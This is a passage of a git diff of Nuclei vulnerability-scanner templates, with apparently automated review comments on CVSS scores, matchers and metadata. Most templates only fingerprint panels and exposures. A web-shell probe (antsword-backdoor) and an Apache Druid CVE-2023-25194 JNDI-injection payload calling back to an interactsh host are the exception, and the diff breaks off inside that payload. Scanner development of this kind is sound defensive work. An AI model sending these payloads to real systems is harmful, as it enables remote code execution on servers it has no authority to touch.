https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 metadata: verified: true + max-request: 1 google-query: inurl:/wp-content/plugins/wp-analytify - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 tags: wp,wordpress,analytify,wpscan,wp-plugin,xss -requests: +http: - method: GET path: - '{{BaseURL}}/aa404bb?a' @@ -40,4 +41,4 @@ requests: status: - 404 -# Enhanced by mp on 2022/09/07 +# digest: 4b0a00483046022100e09cd2cb41d74201a55b08ad6c64761c1d0ddfc72a64f63eed0e6d886e298baf0221009e9e3ac9fbb67b006a5dca925a6426f863dc636facc5a7299b2e80d92b2edd0c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/anaqua-login-panel.yaml b/nuclei-templates/Other/anaqua-login-panel.yaml index 0c5a0ec6b9..910fd83a12 100644 
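Review bot: The first `words` entry in the new `ampps-panel-310.yaml` is an empty string `''`, which under `condition: and` matches every response body and adds nothing to the fingerprint; the deleted `-309` file carries the same empty entry, so this looks like an HTML fragment stripped during rendering rather than an intentional value. Restore the original string or drop the entry, otherwise the check degrades to `Login` plus the favicon path. The new file also uses `redirects: true`, whereas other hunks in this commit use `host-redirects: true`; if the engine still accepts the old key this is only a consistency point.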
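Review bot: The new classification in `analytify-plugin-xss.yaml` sets `PR:L` (and `cvss-score: 5.4`), but the request in this hunk is an unauthenticated `GET /aa404bb?a` and the description says the current URL is reflected into the 404 page — the standard reflected-XSS case, whose vector is `AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` scoring 6.1. Unless the 404-tracking feature only renders for logged-in users, the lines should read `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` and `cvss-score: 6.1`. `cwe-id: CWE-80` is also unusual for this repository, which tags XSS with `CWE-79` (as the removed lines did); CWE-80 is a narrower child and makes the template harder to group with the other XSS checks.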
--- a/nuclei-templates/Other/anaqua-login-panel.yaml +++ b/nuclei-templates/Other/anaqua-login-panel.yaml @@ -8,12 +8,11 @@ info: Checks for the presence of Anaqua login page classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: title:"Anaqua User Sign On"" + verified: true tags: anaqua,login,panel http: @@ -33,5 +32,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022060d150b256f40e43d6af397522ba3bbd382272d4d9eb1e0a051ff5991f287eac022100ec26375c36ddb970378b49e6bc3d54a8a4ece3d7343064fe43746bb9be38d497:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201189396d086e2b7bb798f88291df48a4d16eeeb737952f35ad48a022999bf28a022100a648a6cd84fa8c2aa9da5a3477b096fd0e71be1224ee429dff3c0c86676d824a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/android-debug-database-exposed-312.yaml b/nuclei-templates/Other/android-debug-database-exposed-312.yaml deleted file mode 100644 index 669be2723a..0000000000 --- a/nuclei-templates/Other/android-debug-database-exposed-312.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: android-debug-database-exposed - -info: - name: Android Debug Manager - author: dhiyaneshDK - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22 - tags: unauth,android - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Android Debug Database' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/android-debug-database-exposed.yaml b/nuclei-templates/Other/android-debug-database-exposed.yaml new file mode 100644 index 0000000000..94bf98c494 --- /dev/null +++ b/nuclei-templates/Other/android-debug-database-exposed.yaml 
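Review bot: The context line `shodan-query: title:"Anaqua User Sign On""` has a stray trailing quote, and the commit edits the line directly below it (`+ verified: true`) without fixing it. Because the value is a plain YAML scalar, the extra `"` becomes part of the query string and will break the Shodan search this metadata is meant to reproduce; it should be `shodan-query: title:"Anaqua User Sign On"`. This is a pre-existing defect rather than one introduced here, but it sits one line from the change.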
@@ -0,0 +1,24 @@ +id: android-debug-database-exposed + +info: + name: Android Debug Manager + author: dhiyaneshDK + severity: low + reference: + - https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22 + tags: unauth,android + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Android Debug Database' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/andromeda-malware.yaml b/nuclei-templates/Other/andromeda-malware.yaml index 64c7732254..95fafe77ee 100644 --- a/nuclei-templates/Other/andromeda-malware.yaml +++ b/nuclei-templates/Other/andromeda-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Andromeda.yar tags: malware,file - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: binary binary: - - "1C1C1D03494746" \ No newline at end of file + - "1C1C1D03494746" + +# digest: 490a0046304402201778cf53991884f7b29706930aec0f8acfce69528e080663a436bdba0b42546a0220636a9eee01a609195564a9f19c89721357a20d1b3460d1beeff7b33b961c74b0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/angular-client-side-template-injection.yaml b/nuclei-templates/Other/angular-client-side-template-injection.yaml index 6e666f4aa4..98993c6b07 100644 --- a/nuclei-templates/Other/angular-client-side-template-injection.yaml +++ b/nuclei-templates/Other/angular-client-side-template-injection.yaml 
@@ -4,10 +4,16 @@ info: name: Angular Client-side-template-injection author: theamanrawat severity: high + description: | + Detects Angular client-side template injection vulnerability. + impact: | + May lead to remote code execution or sensitive data exposure. + remediation: | + Sanitize user inputs and avoid using user-controlled data in template rendering. reference: - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/ - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs - tags: angular,csti,dast + tags: angular,csti,dast,headless,xss variables: first: "{{rand_int(1000, 9999)}}" @@ -19,6 +25,7 @@ headless: - action: navigate args: url: "{{BaseURL}}" + - action: waitload payloads: @@ -37,3 +44,4 @@ headless: part: body words: - "{{result}}" +# digest: 4a0a00473045022100adfe788d650a997bddf7f4876f1308a9d1ea62d43e7b90abca139f455492d4e902203223d59aac1aa4374770127adface5ccebfd4a4dc8fdfef8b240578bf7b6df72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/angular-detect.yaml b/nuclei-templates/Other/angular-detect.yaml index 751e4ff138..ee01efcaa1 100644 --- a/nuclei-templates/Other/angular-detect.yaml +++ b/nuclei-templates/Other/angular-detect.yaml @@ -9,16 +9,16 @@ info: - https://github.com/angular/angular metadata: verified: true + max-request: 1 shodan-query: html:"ng-version=" tags: tech,angular -requests: +http: - method: GET path: - "{{BaseURL}}" matchers-condition: and - matchers: - part: body type: word @@ -30,3 +30,5 @@ requests: group: 1 regex: - 'ng-version="([0-9.]+)"' + +# digest: 4b0a00483046022100c27e4418203c86638e6e00c792093e221ffdaf641129125c28ae3fa6c59fc6c3022100a0584f76ff9fb8e7cd13351c2f8856ad173adf6bd7a6bff20c88e8c0ca0a80ef:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/angular-json.yaml b/nuclei-templates/Other/angular-json.yaml index 4288841af0..dd588d3b8a 100644 
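Review bot: The added `impact` text says the issue "may lead to remote code execution", but Angular client-side template injection executes in the victim's browser — the PortSwigger reference in this hunk ("XSS without HTML") and the `xss` tag the commit adds both frame it as XSS — so "remote code execution" overstates the server-side risk and will mislead triage. Suggested wording: `impact: | Allows arbitrary JavaScript execution in the victim's browser (client-side template injection), with the same impact as reflected XSS.` The `remediation` text is fine as written.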
--- a/nuclei-templates/Other/angular-json.yaml +++ b/nuclei-templates/Other/angular-json.yaml @@ -6,12 +6,13 @@ info: severity: info metadata: verified: true + max-request: 4 shodan-query: - html:"angular.json" - html:"angular-cli.json" tags: exposure,angularjs,files -requests: +http: - method: GET path: - "{{BaseURL}}/.angular-cli.json" @@ -20,6 +21,7 @@ requests: - "{{BaseURL}}/.angular.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -37,3 +39,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100a17e551eb0d7282c84cbe80752cfc5cd8bb2cc4bcd1f57210bd3bf8090ff884702203cbb81aa88602b99846e1c74c29e3bcb1ee3d64cf681d7d54f4fda618fc037b0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/anima-takeover.yaml b/nuclei-templates/Other/anima-takeover-317.yaml similarity index 100% rename from nuclei-templates/Other/anima-takeover.yaml rename to nuclei-templates/Other/anima-takeover-317.yaml diff --git a/nuclei-templates/Other/Anni-fileDownload.yaml b/nuclei-templates/Other/anni-filedownload.yaml similarity index 100% rename from nuclei-templates/Other/Anni-fileDownload.yaml rename to nuclei-templates/Other/anni-filedownload.yaml diff --git a/nuclei-templates/Other/announcekit-takeover-322.yaml b/nuclei-templates/Other/announcekit-takeover-324.yaml similarity index 100% rename from nuclei-templates/Other/announcekit-takeover-322.yaml rename to nuclei-templates/Other/announcekit-takeover-324.yaml diff --git a/nuclei-templates/Other/ansible-awx-detect.yaml b/nuclei-templates/Other/ansible-awx-detect.yaml index c777d338dd..45b7f5da8d 100644 --- a/nuclei-templates/Other/ansible-awx-detect.yaml +++ b/nuclei-templates/Other/ansible-awx-detect.yaml @@ -9,10 +9,11 @@ info: - https://github.com/ansible/awx metadata: verified: true + max-request: 1 shodan-query: html:'Select a frequency for snapshot retention' tags: tech,ansible,awx -requests: +http: - method: GET path: - "{{BaseURL}}/api/" 
@@ -27,3 +28,5 @@ requests: - type: status status: - 200 + +# digest: 4b0a00483046022100bf020e7e2d3b06a43e585b146a2b8cd4394bea88271f1d13d4efb3a96460d95a022100d43ab83f2902c67fd8854e4d1f8daf8e1fceb8a59d3fdcb8ce065c96a1827a08:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/ansible-config-disclosure-326.yaml b/nuclei-templates/Other/ansible-config-disclosure-326.yaml deleted file mode 100644 index 92a9879206..0000000000 --- a/nuclei-templates/Other/ansible-config-disclosure-326.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: ansible-config-disclosure - -info: - name: Ansible Configuration Exposure - author: pdteam - severity: medium - tags: config,exposure - -requests: - - method: GET - path: - - '{{BaseURL}}/ansible.cfg' - matchers: - - type: word - words: - - '[defaults]' - - '[inventory]' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/ansible-config-disclosure.yaml b/nuclei-templates/Other/ansible-config-disclosure.yaml new file mode 100644 index 0000000000..45c790f6a9 --- /dev/null +++ b/nuclei-templates/Other/ansible-config-disclosure.yaml @@ -0,0 +1,16 @@ +id: ansible-config-disclosure +info: + name: Ansible Configuration Exposure + author: pdteam + severity: medium + tags: config,exposure +requests: + - method: GET + path: + - '{{BaseURL}}/ansible.cfg' + matchers: + - type: word + words: + - '[defaults]' + - '[inventory]' + condition: and diff --git a/nuclei-templates/Other/ansible-semaphore-panel-327.yaml b/nuclei-templates/Other/ansible-semaphore-panel-327.yaml deleted file mode 100644 index 3d5fb94471..0000000000 --- a/nuclei-templates/Other/ansible-semaphore-panel-327.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: ansible-semaphore-panel - -info: - name: Ansible Semaphore Panel Detect - author: Yuzhe-zhang-0 - description: An Ansible Semaphore login panel was detected. - severity: info - reference: - - https://ansible-semaphore.com/ - - https://github.com/ansible-semaphore/semaphore - metadata: - shodan-query: http.html:"Semaphore" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - tags: panel,ansible,semaphore,cicd,oss - -requests: - - method: GET - path: - - '{{BaseURL}}/auth/login' - - matchers-condition: or - matchers: - - type: word - words: - - 'Ansible Semaphore' - - - type: regex - regex: - - 'Semaphore' - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/ansible-semaphore-panel.yaml b/nuclei-templates/Other/ansible-semaphore-panel.yaml new file mode 100644 index 0000000000..0aa276d1d5 --- /dev/null +++ b/nuclei-templates/Other/ansible-semaphore-panel.yaml @@ -0,0 +1,26 @@ +id: ansible-semaphore-panel + +info: + name: Ansible Semaphore Panel + author: Yuzhe-zhang-0 + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Ansible+Semaphore%22 + tags: panel,ansible,semaphore,cicd + +requests: + - method: GET + redirects: true + max-redirects: 5 + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ansible Semaphore' + - '>Semaphore' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/ansible-tower-exposure-331.yaml b/nuclei-templates/Other/ansible-tower-exposure-331.yaml deleted file mode 100644 index 413cf6170f..0000000000 --- a/nuclei-templates/Other/ansible-tower-exposure-331.yaml +++ /dev/null 
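Review bot: The word matcher in the new `ansible-semaphore-panel.yaml` lists `'Ansible Semaphore'` and `'>Semaphore'` with no `condition:`, so the default `or` applies and any HTTP 200 page containing `>Semaphore` satisfies the check — a weak fingerprint that will flag unrelated products with that name. Either add `condition: and` under the words or drop the `>Semaphore` entry. The deleted `-327` file also carried `description`, `classification` and the more specific `/auth/login` path, none of which the replacement keeps, and `redirects: true` should be `host-redirects: true` to match the other hunks in this commit.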
@@ -1,40 +0,0 @@ -id: ansible-tower-exposure - -info: - name: Ansible Tower Exposure - author: pdteam,idealphase - severity: low - description: Ansible Tower was detected. Ansible Tower is a commercial offering that helps teams manage complex multi-tier deployments by adding control, knowledge, and delegation to Ansible-powered environments. - reference: - - https://docs.ansible.com/ansible-tower/3.8.4/html/administration/ - - https://docs.ansible.com/ansible-tower/latest/html/release-notes/index.html - metadata: - google-query: intitle:"Ansible Tower" - shodan-query: title:"Ansible Tower" - tags: panel,ansible - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - "Ansible Tower" - - "ansible-bootstrap" - condition: or - - extractors: - - type: regex - group: 1 - part: body - regex: - - 'href="\/static\/assets\/favicon\.ico\?v=(.+)" \/>' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ansible-tower-exposure-332.yaml b/nuclei-templates/Other/ansible-tower-exposure-332.yaml new file mode 100644 index 0000000000..72789c4755 --- /dev/null +++ b/nuclei-templates/Other/ansible-tower-exposure-332.yaml @@ -0,0 +1,19 @@ +id: ansible-tower-exposure + +info: + name: Ansible Tower Exposure + author: pdteam + severity: low + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "Ansible Tower" + - "ansible-main-menu" + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/antispam-bee.yaml b/nuclei-templates/Other/antispam-bee.yaml index 9926b74ac4..359671f3bd 100644 --- a/nuclei-templates/Other/antispam-bee.yaml +++ b/nuclei-templates/Other/antispam-bee.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: 
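Review bot: `ansible-tower-exposure-332.yaml` loses the `description`, `reference`, `metadata` (google/shodan queries) and `classification` that the deleted `-331` file had, and its `tags` shrink from `panel,ansible` to `panel`, so the template is no longer selected by a tag filter on `ansible`. Carry at least `description: Ansible Tower was detected.` and `tags: panel,ansible` over. The `-332` suffix in the filename also does not match `id: ansible-tower-exposure`, while other hunks in this diff are stripping such numeric suffixes (e.g. apache-dubbo-detect-351 → apache-dubbo-detect).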
diff --git a/nuclei-templates/Other/antsword-backdoor-335.yaml b/nuclei-templates/Other/antsword-backdoor-335.yaml deleted file mode 100644 index d3136b00c4..0000000000 --- a/nuclei-templates/Other/antsword-backdoor-335.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: antsword-backdoor - -info: - name: Antsword Backdoor Identified - author: ffffffff0x - severity: critical - description: The Antsword application contains a backdoor shell. - remediation: Reinstall Anstsword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. - reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 - tags: backdoor,antsword - classification: - cwe-id: CWE-553 - cvss-score: 10.0 - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - -requests: - - method: POST - path: - - "{{BaseURL}}/.antproxy.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: 'ant=echo md5("antproxy.php");' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "951d11e51392117311602d0c25435d7f" - - - type: status - status: - - 200 - -# Enhanced by cs 2022/03/31 diff --git a/nuclei-templates/Other/antsword-backdoor.yaml b/nuclei-templates/Other/antsword-backdoor.yaml new file mode 100644 index 0000000000..160e514e1b --- /dev/null +++ b/nuclei-templates/Other/antsword-backdoor.yaml 
@@ -0,0 +1,24 @@ +id: antsword-backdoor +info: + name: Antsword backdook + author: ffffffff0x + severity: critical + description: 蚁剑「绕过 disable_functions」插件生成的 shell + reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 + tags: backdoor,antsword +requests: + - method: POST + path: + - "{{BaseURL}}/.antproxy.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: 'ant=echo md5("antproxy.php");' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "951d11e51392117311602d0c25435d7f" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/AolynkBR304-weakPass.yaml b/nuclei-templates/Other/aolynkbr304-weakpass.yaml similarity index 100% rename from nuclei-templates/Other/AolynkBR304-weakPass.yaml rename to nuclei-templates/Other/aolynkbr304-weakpass.yaml diff --git a/nuclei-templates/Other/ap0calypse-malware.yaml b/nuclei-templates/Other/ap0calypse-malware.yaml index 55f1f59b8d..c60918be29 100644 --- a/nuclei-templates/Other/ap0calypse-malware.yaml +++ b/nuclei-templates/Other/ap0calypse-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -21,4 +19,6 @@ file: - "Baslik" - "Dosyalars" - "Injecsiyon" - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a004730450221009a4fe2a01a81f0ce6902dff99fd80899a03564015ef45e6a0cf97470115f32b3022027b355be70bb66fb654b7ea8d1cfc34de9d61102a4d5a66f8218b764b4d94897:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apache-activemq-detect.yaml b/nuclei-templates/Other/apache-activemq-detect.yaml index 0c096a254b..a6428320a2 100644 --- a/nuclei-templates/Other/apache-activemq-detect.yaml +++ b/nuclei-templates/Other/apache-activemq-detect.yaml 
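Review bot: `name: Antsword backdook` is a typo for `backdoor`, and the English `description`, `remediation` and `classification` that the deleted `-335` version carried are replaced by a one-line Chinese description, so the template now tells an operator who receives the finding less than before. Suggest `name: Antsword Backdoor Identified`, `description: The Antsword application contains a backdoor shell.` and restoring the `remediation:` and `classification:` block (CWE-553, CVSS 10.0) from the removed file. The trailing `# Enhanced by cs 2022/03/31` is gone, which is consistent with what the rest of this diff does to such trailers.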
@@ -1,27 +1,29 @@ -id: apache-activemq-detect - -info: - name: Apache ActiveMQ Detection - author: pussycat0x - severity: info - description: | - Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. - metadata: - verified: true - shodan-query: 'product:"Apache ActiveMQ"' - tags: network,activemq,oss - -network: - - inputs: - - data: "HELP\n\n\u0000" - - host: - - "{{Hostname}}" - - "{{Host}}:61613" - - matchers-condition: and - matchers: - - type: word - words: - - "Unknown STOMP action" - - "norg.apache.activemq.transport.stomp" +id: apache-activemq-detect + +info: + name: Apache ActiveMQ Detection + author: pussycat0x + severity: info + description: | + Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. + metadata: + max-request: 1 + shodan-query: product:"Apache ActiveMQ" + verified: true + tags: network,activemq,oss,detect,apache + +tcp: + - inputs: + - data: "HELP\n\n\u0000" + + host: + - "{{Hostname}}" + port: 61613 + + matchers-condition: and + matchers: + - type: word + words: + - "Unknown STOMP action" + - "norg.apache.activemq.transport.stomp" +# digest: 490a00463044022033fe5150c7014f8708898bc413ba6b34a25fbe05eb62a95949dced8517b3fb97022025e014d08d8ae2f1c85aaced79e66f3da695214f8a893a354cef418ced51ba90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/APACHE-Ambari-weakPass.yaml b/nuclei-templates/Other/apache-ambari-weakpass.yaml similarity index 100% rename from nuclei-templates/Other/APACHE-Ambari-weakPass.yaml rename to nuclei-templates/Other/apache-ambari-weakpass.yaml 
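Review bot: Every one of the 27 lines is removed and re-added, so the real changes — `network:` → `tcp:`, `{{Host}}:61613` replaced by `port: 61613`, the added `max-request: 1` and the `detect,apache` tags — are buried in what is presumably a line-ending or trailing-whitespace normalization (the old and new text of most lines is identical). Separate the whitespace change from the protocol change so the functional diff is reviewable. The digest is appended with `\ No newline at end of file`, whereas other templates in this diff end with a newline after the digest; the digest tooling should pick one form.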
diff --git a/nuclei-templates/Other/apache-apisix-panel-336.yaml b/nuclei-templates/Other/apache-apisix-panel-336.yaml new file mode 100644 index 0000000000..2c6124e710 --- /dev/null +++ b/nuclei-templates/Other/apache-apisix-panel-336.yaml @@ -0,0 +1,30 @@ +id: apache-apisix-panel + +info: + name: Apache APISIX Login Panel + author: pikpikcu + severity: info + description: An Apache APISIX login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/user/login?redirect=%2F" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Apache APISIX Dashboard' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/apache-apisix-panel-337.yaml b/nuclei-templates/Other/apache-apisix-panel-337.yaml deleted file mode 100644 index 6d3f464a45..0000000000 --- a/nuclei-templates/Other/apache-apisix-panel-337.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: apache-apisix-panel - -info: - name: Apache APISIX Panel detect - author: pikpikcu - severity: info - metadata: - fofa-query: title="Apache APISIX Dashboard" - tags: apache,apisix,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/user/login?redirect=%2F" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Apache APISIX Dashboard' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/apache-axis-detect-340.yaml b/nuclei-templates/Other/apache-axis-detect-340.yaml index 3d78cd86bd..b5b574a7b5 100644 --- a/nuclei-templates/Other/apache-axis-detect-340.yaml +++ b/nuclei-templates/Other/apache-axis-detect-340.yaml 
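Review bot: `apache-apisix-panel-336.yaml` reintroduces a `# Enhanced by mp on 2022/03/16` trailer, which this same diff removes from apache-jmeter-dashboard and apache-mesos-panel; drop it here too. The file name carries a `-336` suffix that does not match `id: apache-apisix-panel`, and the deleted `-337` file had the same id, so this is a rename by delete-and-add that should be a plain rename plus the one-line `description` addition, which is the only substantive difference between the two files.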
@@ -1,32 +1,32 @@ -id: apache-axis-detect - -info: - name: apache-axis-detect - author: dogasantos - severity: info - description: Axis and Axis2 detection - tags: tech,axis2,middleware,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/axis2/" - - "{{BaseURL}}/axis/" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Validate" - - "Welcome" - - "Axis" - - "deployed" - - "installation" - - "Admin" - condition: and - - - type: status - status: - - 200 +id: apache-axis-detect + +info: + name: apache-axis-detect + author: dogasantos + severity: info + description: Axis and Axis2 detection + tags: tech,axis2,middleware,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/axis2/" + - "{{BaseURL}}/axis/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Validate" + - "Welcome" + - "Axis" + - "deployed" + - "installation" + - "Admin" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/apache-detect-348.yaml b/nuclei-templates/Other/apache-detect-348.yaml new file mode 100644 index 0000000000..4db33ceb08 --- /dev/null +++ b/nuclei-templates/Other/apache-detect-348.yaml @@ -0,0 +1,30 @@ +id: apache-detect +info: + name: Apache Detection + author: philippedelteil + description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained + severity: info + tags: tech,apache + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: regex + part: header + regex: + - "Apache+" + + - type: status + status: + - 200 + + extractors: + - type: kval + part: header + kval: + - Server \ No newline at end of file diff --git a/nuclei-templates/Other/apache-detect.yaml b/nuclei-templates/Other/apache-detect.yaml deleted file mode 100644 index ba499c5ea5..0000000000 
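Review bot: The header regex `"Apache+"` in `apache-detect-348.yaml` does not do what it looks like: `+` binds only to the trailing `e`, so the pattern is a plain case-sensitive substring match on `Apache` anywhere in the response headers (a `Via` or `X-Powered-By` header would do), not a check of the `Server` header the description and the `kval` extractor are about. Anchor it to that header, e.g. `- "(?mi)^Server:.*Apache"`. The file is otherwise byte-identical to the `apache-detect.yaml` deleted in the next hunk, so this is a rename to a numbered filename done as delete-and-add — the opposite of the de-numbering renames elsewhere in this diff.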
--- a/nuclei-templates/Other/apache-detect.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apache-detect -info: - name: Apache Detection - author: philippedelteil - description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained - severity: info - tags: tech,apache - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - - type: regex - part: header - regex: - - "Apache+" - - - type: status - status: - - 200 - - extractors: - - type: kval - part: header - kval: - - Server \ No newline at end of file diff --git a/nuclei-templates/Other/apache-drill-exposure.yaml b/nuclei-templates/Other/apache-drill-exposure.yaml index 7606bfbb86..5ae85c1fd8 100644 --- a/nuclei-templates/Other/apache-drill-exposure.yaml +++ b/nuclei-templates/Other/apache-drill-exposure.yaml @@ -4,12 +4,14 @@ info: name: Apache Drill Exposure author: DhiyaneshDK severity: low + description: Apache Drill is exposed. metadata: verified: true + max-request: 1 shodan-query: title:"Apache Drill" tags: misconfig,exposure,apache,drill -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -29,3 +31,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022030a4b7d4ffd3e534e720562827eace6ff4cd882b42ea16bfc4f29e2acf204f03022100cc67ba72b9d427ec1d39676424f61bbca5cff7ad1cae2c5e09535a4d04f519d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml b/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml new file mode 100644 index 0000000000..c250daba2a --- /dev/null +++ b/nuclei-templates/Other/apache-druid-kafka-connect-rce.yaml 
@@ -0,0 +1,99 @@ +id: CVE-2023-25194 + +info: + name: Apache Druid Kafka Connect - Remote Code Execution + author: j4vaovo + severity: high + description: | + The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194 + - https://nvd.nist.gov/vuln/detail/CVE-2023-25194 + - https://github.com/nbxiglk0/Note/blob/0ddc14ecd296df472726863aa5d1f0f29c8adcc4/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/Java/ApacheDruid/ApacheDruid%20Kafka-rce/ApacheDruid%20Kafka-rce.md#apachedruid-kafka-connect-rce + - http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html + - https://kafka.apache.org/cve-list + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-25194 + cwe-id: CWE-502 + epss-score: 0.89626 + epss-percentile: 0.98692 + cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: apache + product: kafka_connect + shodan-query: html:"Apache Druid" + tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast + +http: + - raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type":"kafka", + "spec":{ + "type":"kafka", + "ioConfig":{ + "type":"kafka", + "consumerProperties":{ + "bootstrap.servers":"127.0.0.1:6666", + "sasl.mechanism":"SCRAM-SHA-256", + "security.protocol":"SASL_SSL", + "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"rmi://{{interactsh-url}}:6666/test\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" + }, + "topic":"test", + "useEarliestOffset":true, + "inputFormat":{ + "type":"regex", + 
